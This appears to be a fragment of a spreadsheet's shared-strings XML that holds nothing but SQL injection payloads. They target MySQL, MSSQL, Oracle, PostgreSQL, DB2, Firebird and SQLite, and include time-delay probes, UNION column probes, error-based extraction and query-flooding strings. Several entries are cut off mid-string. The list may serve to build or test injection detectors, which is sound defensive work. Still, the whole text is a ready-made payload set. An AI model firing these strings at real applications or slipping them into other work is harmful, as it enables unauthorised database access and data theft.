    <t>1' and sleep ( 5 )  and 'kapr' = 'kapr</t>
  </si>
  <si>
    <t>-3074'  )  )   union all select 6131,6131,6131,6131,6131,6131,6131--</t>
  </si>
  <si>
    <t>-9176'  )  )   as eunw where 5978 = 5978 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>-5227" union all select 2666--</t>
  </si>
  <si>
    <t>1' in boolean mode )  and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select  ( case when  ( 7734 = 7734 )  then  ( select benchmark ( 5000000,md5 ( 0x72747341  )  )   )  else 7734* ( select 7734 from mysql.db )  end  )  )  </t>
  </si>
  <si>
    <t>1' union all select null,null,null#</t>
  </si>
  <si>
    <t>-8966"  )  )   )  or 1628 = 2712</t>
  </si>
  <si>
    <t>1' where 4253 = 4253</t>
  </si>
  <si>
    <t>1" where 7788 = 7788 or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1'  )  )   waitfor delay '0:0:5' and   (  (  'jcfe' = 'jcfe</t>
  </si>
  <si>
    <t>-9808' in boolean mode )  union all select 2528,2528,2528,2528,2528,2528,2528--</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1' )  and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null )  and  ( 'qutm' = 'qutm</t>
  </si>
  <si>
    <t>1' )  as qqyz where 2274 = 2274</t>
  </si>
  <si>
    <t>1%" )  and 9764 = 6037 and  ( "%" = "</t>
  </si>
  <si>
    <t>-2204'|| ( select 'bwae' from dual where 4884 = 4884 union all select 4884,4884,4884,4884,4884,4884,4884,4884,4884,4884#</t>
  </si>
  <si>
    <t>1 )  where 5866 = 5866 and 4595 = 4595#</t>
  </si>
  <si>
    <t>1'|| ( select 'ylek' where 3803 = 3803 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )    )  )  ||'</t>
  </si>
  <si>
    <t>1'+ ( select wpkh where 5842 = 5842</t>
  </si>
  <si>
    <t>1" )  as ltbl where 6395 = 6395</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select * from  ( select ( sleep ( 5  )  )   ) lrov ) </t>
  </si>
  <si>
    <t>1 )  and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1'  )  )   )  and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and   (  (   ( 'viad' like 'viad</t>
  </si>
  <si>
    <t>1%" and elt ( 1210 = 1210,sleep ( 5  )  )   and "%" = "</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (   ( 'aatp' = 'aatp</t>
  </si>
  <si>
    <t>-7387'  )  )   )  order by 1--</t>
  </si>
  <si>
    <t>1'  )  )   )  and 6414 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and   (  (   ( 'qtni' = 'qtni</t>
  </si>
  <si>
    <t>1"  )  )   )  and  ( 7396 = 6351 ) *6351 and   (  (   ( "xerw" like "xerw</t>
  </si>
  <si>
    <t>1 )  as nioj where 9703 = 9703</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  </t>
  </si>
  <si>
    <t>1'|| ( select 'bezt' where 7876 = 7876</t>
  </si>
  <si>
    <t>1%"  )  )   and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1" )  as hfgk where 1100 = 1100 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1"  )  )   rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and   (  (  "ladc" like "ladc</t>
  </si>
  <si>
    <t>1"  )  )   rlike sleep ( 5 ) #</t>
  </si>
  <si>
    <t>-4452%" union all select 7141,7141,7141,7141,7141,7141,7141,7141--</t>
  </si>
  <si>
    <t>1%' and elt ( 3114 = 3114,sleep ( 5  )  )  #</t>
  </si>
  <si>
    <t>-5217 where 3620 = 3620 or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||c</t>
  </si>
  <si>
    <t>select * from generate_series ( 1431,1431,case when  ( 1431 = 7822 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>-1084' )  union all select 2634,2634,2634,2634,2634,2634,2634,2634#</t>
  </si>
  <si>
    <t xml:space="preserve"> ( select  ( case when  ( 6714 = 8872 )  then 1 else 6714* ( select 6714 from master..sysdatabases )  end  )  )  </t>
  </si>
  <si>
    <t>1"  )  )   or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and   (  (  "ejpw" = "ejpw</t>
  </si>
  <si>
    <t>-9740"  )  )   as pxkx where 5305 = 5305 or 1 group by concat ( 0x7171706a71, ( select  ( case when  ( 4232 = 4232 )  then 1 else 0 end  )  )  ,0x717a767a71,floor ( rand ( 0 ) *2  )  )   having min ( 0 ) #</t>
  </si>
  <si>
    <t>-1031%" union all select 6832,6832,6832,6832#</t>
  </si>
  <si>
    <t>1%' )  or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1 or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) </t>
  </si>
  <si>
    <t xml:space="preserve">1" and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  </t>
  </si>
  <si>
    <t>1  )  )   or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and   (  (  8965 = 8965</t>
  </si>
  <si>
    <t>1"  )  )   )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (   ( "prtf" like "prtf</t>
  </si>
  <si>
    <t>-7661" union all select 9551,9551,9551#</t>
  </si>
  <si>
    <t>-1985%'  )  )   )  union all select 3051,3051,3051--</t>
  </si>
  <si>
    <t>1' in boolean mode )  and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1%" )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and  ( "%" = "</t>
  </si>
  <si>
    <t>1"  )  )   )  and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and   (  (   ( "sfbc" = "sfbc</t>
  </si>
  <si>
    <t>1' )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and  ( 'lzbn' = 'lzbn</t>
  </si>
  <si>
    <t>1'|| ( select 'czos' from dual where 6814 = 6814</t>
  </si>
  <si>
    <t>1' )  as omtb where 1183 = 1183 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>-7923"  )  )   or make_set ( 9354 = 9354,7185 )  and   (  (  "szct" = "szct</t>
  </si>
  <si>
    <t>1 and 6240 =  ( 'qqpjq'|| ( select case 6240 when 6240 then 1 else 0 end from rdb$database ) ||'qzvzq' ) # twev</t>
  </si>
  <si>
    <t>1"  )  )   as ikuz where 7385 = 7385</t>
  </si>
  <si>
    <t>1%"  )  )   )  or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1 )  as xtgr where 1545 = 1545</t>
  </si>
  <si>
    <t>1 )  and  ( select 9067 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9067 = 9067,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and  ( 8529 = 8529</t>
  </si>
  <si>
    <t>if ( 8182 = 3225 )  select 8182 else drop function kpzk--</t>
  </si>
  <si>
    <t>1"  )  )   union all select null,null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1 )  where 1880 = 1880 and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>1' )  as nmzp where 3794 = 3794 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1"  )  )   waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1%' )  or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1%"  )  )   union all select null,null--</t>
  </si>
  <si>
    <t>1 )  where 9687 = 9687 and elt ( 9607 = 9432,9432 ) --</t>
  </si>
  <si>
    <t>1" where 7879 = 7879</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 4457 = 3885#</t>
  </si>
  <si>
    <t>1%'  )  )   union all select null,null,null,null--</t>
  </si>
  <si>
    <t>1" )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and  ( "zyeo" like "zyeo</t>
  </si>
  <si>
    <t>1" where 7371 = 7371 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1%'  )  )   and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1' and 2908 = 8067--</t>
  </si>
  <si>
    <t>1' )  as sjij where 8659 = 8659</t>
  </si>
  <si>
    <t>1'|| ( select 'ssvp' where 3300 = 3300 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1  )  )   )  waitfor delay '0:0:5' and   (  (   ( 3481 = 3481</t>
  </si>
  <si>
    <t>1'|| ( select 'glyc' from dual where 4058 = 4058</t>
  </si>
  <si>
    <t>1'|| ( select 'avxz' from dual where 7815 = 7815</t>
  </si>
  <si>
    <t>1'  )  )   as uncy where 8009 = 8009 union all select null,null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1'+ ( select 'sqje' where 1634 = 1634 or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   ) +'</t>
  </si>
  <si>
    <t xml:space="preserve"> select sleep ( 5 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t xml:space="preserve">1" or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu ) </t>
  </si>
  <si>
    <t>1' )  as viex where 6242 = 6242 and 6537 = dbms_pipe.receive_message ( chr ( 76 ) ||chr ( 116 ) ||chr ( 117 ) ||chr ( 65 ) ,5 ) --</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1" )  as vdim where 1296 = 1296</t>
  </si>
  <si>
    <t>1  )  )   as xcsm where 9231 = 9231</t>
  </si>
  <si>
    <t>1%" and elt ( 5345 = 8751,8751 )  and "%" = "</t>
  </si>
  <si>
    <t>1" where 7279 = 7279 or 8514 = benchmark ( 5000000,md5 ( 0x544d5a4c  )  )  #</t>
  </si>
  <si>
    <t>1' )  as yhgk where 9246 = 9246 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1' )  as myxr where 6299 = 6299 and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1%"  )  )   or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1" )  as xrsi where 9498 = 9498</t>
  </si>
  <si>
    <t>-4692%"  )  )   union all select 1781,1781#</t>
  </si>
  <si>
    <t>1%'  )  )   )  union all select null,null,null,null,null#</t>
  </si>
  <si>
    <t>1%"  )  )   )  union all select null--</t>
  </si>
  <si>
    <t>1 )  as ztrb where 1052 = 1052 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>1"  )  )   )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and   (  (   ( "vfoh" = "vfoh</t>
  </si>
  <si>
    <t>1'|| ( select 'nfgq' where 1837 = 1837 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-5066'  )  )   union all select 9689,9689,9689,9689#</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5</t>
  </si>
  <si>
    <t>-7903 where 6699 = 6699 or 8571 = 8571--</t>
  </si>
  <si>
    <t xml:space="preserve">-2102' where 3644 = 3644 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr </t>
  </si>
  <si>
    <t>1%"  )  )   )  and 4595 = 4595#</t>
  </si>
  <si>
    <t>1%" and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and "%" = "</t>
  </si>
  <si>
    <t>1'  )  )   and  ( 5091 = 8681 ) *8681 and   (  (  'xevm' = 'xevm</t>
  </si>
  <si>
    <t>-7776' )  or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr (</t>
  </si>
  <si>
    <t>1%"  )  )   )  and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>-4256' )  where 9545 = 9545 or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||c</t>
  </si>
  <si>
    <t>1" )  where 6065 = 6065 and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1"  )  )   union all select null,null,null#</t>
  </si>
  <si>
    <t>1'|| ( select 'sdll' where 5074 = 5074 or  ( select * from  ( select ( sleep ( 5  )  )   ) ydpu  )  )  ||'</t>
  </si>
  <si>
    <t xml:space="preserve">-1196"  )  )   or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char </t>
  </si>
  <si>
    <t>1' rlike  ( select  ( case when  ( 5567 = 5586 )  then 1 else 0x28 end  )  )   and 'mmnb' = 'mmnb</t>
  </si>
  <si>
    <t>-4381 or make_set ( 6118 = 3095,3095 ) # lkcr</t>
  </si>
  <si>
    <t>1" )  where 3958 = 3958 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>-3913" where 6085 = 6085 union all select 6085,6085,6085,6085,6085,6085,6085#</t>
  </si>
  <si>
    <t>-8981%"  )  )   )  union all select 4538,4538,4538,4538,4538,4538,4538#</t>
  </si>
  <si>
    <t xml:space="preserve">-1707 )  or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 </t>
  </si>
  <si>
    <t>1%' union all select null#</t>
  </si>
  <si>
    <t>-9891" union all select 7489#</t>
  </si>
  <si>
    <t>-4758%'  )  )   or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t xml:space="preserve">1' or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 ) </t>
  </si>
  <si>
    <t>-1269" union all select 8412,8412,8412,8412,8412,8412,8412,8412--</t>
  </si>
  <si>
    <t>1' )  as fyuh where 7608 = 7608 and 4241 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4241 = 4241 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   ) --</t>
  </si>
  <si>
    <t>-3582 )  where 5873 = 5873 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 1</t>
  </si>
  <si>
    <t>1' in boolean mode )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 ) #</t>
  </si>
  <si>
    <t>1' )  as uvxl where 6211 = 6211 procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1 or 8384 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  </t>
  </si>
  <si>
    <t>1%'  )  )   or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1' and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and 'oofd' = 'oofd</t>
  </si>
  <si>
    <t>1' and 6621 = 4681--</t>
  </si>
  <si>
    <t>1'  )  )   )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (   ( 'ichh' like 'ichh</t>
  </si>
  <si>
    <t>select  ( case when  ( 2352 = 8672 )  then 2352 else 2352* ( select 2352 from information_schema.character_sets )  end ) #</t>
  </si>
  <si>
    <t>1"  )  )   union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1 and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )  # mpyu</t>
  </si>
  <si>
    <t>-5803 )  where 8651 = 8651 or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||</t>
  </si>
  <si>
    <t>1'  )  )   order by 1--</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( select  ( case when  ( 9443 = 9443 )  then sleep ( 5 )  else 9443* ( select 9443 from information_schema.character_sets )  end  )  )  </t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 9229 = 4158,1,1/0 ) </t>
  </si>
  <si>
    <t>-2817 )  where 1212 = 1212 or 3266 = 1102</t>
  </si>
  <si>
    <t>1%"  )  )   rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>1 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>-2007' where 9157 = 9157 union all select 9157,9157,9157,9157,9157,9157,9157,9157,9157#</t>
  </si>
  <si>
    <t>1" )  and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and  ( "rkry" like "rkry</t>
  </si>
  <si>
    <t>1'+ ( select 'qvif' where 1758 = 1758 union all select null,null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-6126 union all select 8486,8486,8486,8486,8486,8486,8486,8486,8486--</t>
  </si>
  <si>
    <t>-1451%' )  union all select 7666,7666,7666#</t>
  </si>
  <si>
    <t>1'  )  )   or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1'  )  )   as qcgf where 9656 = 9656 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t>1 or char ( 119 ) ||char ( 100 ) ||char ( 99 ) ||char ( 121 )  = regexp_substring ( repeat ( right ( char ( 1441 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1%' and 8189 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1"  )  )   and elt ( 1210 = 1210,sleep ( 5  )  )   and   (  (  "utlk" like "utlk</t>
  </si>
  <si>
    <t>1" and 5556 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and "epxq" like "epxq</t>
  </si>
  <si>
    <t>1 )  order by 1--</t>
  </si>
  <si>
    <t>1%"  )  )   )  or 4411 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1' )  where 2227 = 2227</t>
  </si>
  <si>
    <t>1'  )  )   )  or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (   ( 'jwbt' = 'jwbt</t>
  </si>
  <si>
    <t xml:space="preserve">1" or extractvalue ( 1297,concat ( 0x5c,0x7171706a71, ( select  ( elt ( 1297 = 1297,1  )  )   ) ,0x717a767a71  )  )  </t>
  </si>
  <si>
    <t>-4025" or 3038 = 3038</t>
  </si>
  <si>
    <t>1%'  )  )   )  or char ( 68 ) ||char ( 69 ) ||char ( 97 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 5389 ) ,0 ) ,5000000000 ) ,null )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>-6599"  )  )   union all select 2870,2870,2870,2870,2870,2870,2870,2870,2870,2870--</t>
  </si>
  <si>
    <t>1' in boolean mode )  rlike  ( select  ( case when  ( 1343 = 1595 )  then 1 else 0x28 end  )  )  #</t>
  </si>
  <si>
    <t>1' in boolean mode )  and make_set ( 8403 = 8403,8899 ) #</t>
  </si>
  <si>
    <t>if ( 8727 = 4039 )  select 8727 else drop function giql--</t>
  </si>
  <si>
    <t>1"  )  )   or 7417 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 ) --</t>
  </si>
  <si>
    <t>1"  )  )   as bovm where 5560 = 5560 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>1  )  )   waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>select case when 8514 = 3207 then 1 else null end--</t>
  </si>
  <si>
    <t>select sleep ( 5 )  and "irxg" = "irxg</t>
  </si>
  <si>
    <t>select  ( case when  ( 2576 = 7563 )  then 2576 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t xml:space="preserve">-3458' )  where 2053 = 2053 or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( </t>
  </si>
  <si>
    <t>1"  )  )   and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  "rvuz" like "rvuz</t>
  </si>
  <si>
    <t>1'  )  )   as wqhm where 9871 = 9871</t>
  </si>
  <si>
    <t xml:space="preserve"> end and   (  (   ( 'gqhc' = 'gqhc</t>
  </si>
  <si>
    <t>1" and 3707 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 )  and "cgps" like "cgps</t>
  </si>
  <si>
    <t>1" )  waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>-6639' )  as trll where 6271 = 6271 union all select 6271,6271,6271#</t>
  </si>
  <si>
    <t>1' where 9003 = 9003 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1' )  or 6793 =  ( select 6793 from pg_sleep ( 5  )  )   and  ( 'dtzt' like 'dtzt</t>
  </si>
  <si>
    <t>1 where 6095 = 6095 and 8407 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1' in boolean mode )  and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>1'  )  )   ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users )  and   (  (  'rnyb' = 'rnyb</t>
  </si>
  <si>
    <t>1" )  union all select null,null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1  )  )   as llnm where 6510 = 6510 and 3202 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1"  )  )   and 7656 = 5604 and   (  (  "zuhv" = "zuhv</t>
  </si>
  <si>
    <t>1'  )  )   union all select null#</t>
  </si>
  <si>
    <t xml:space="preserve"> end#</t>
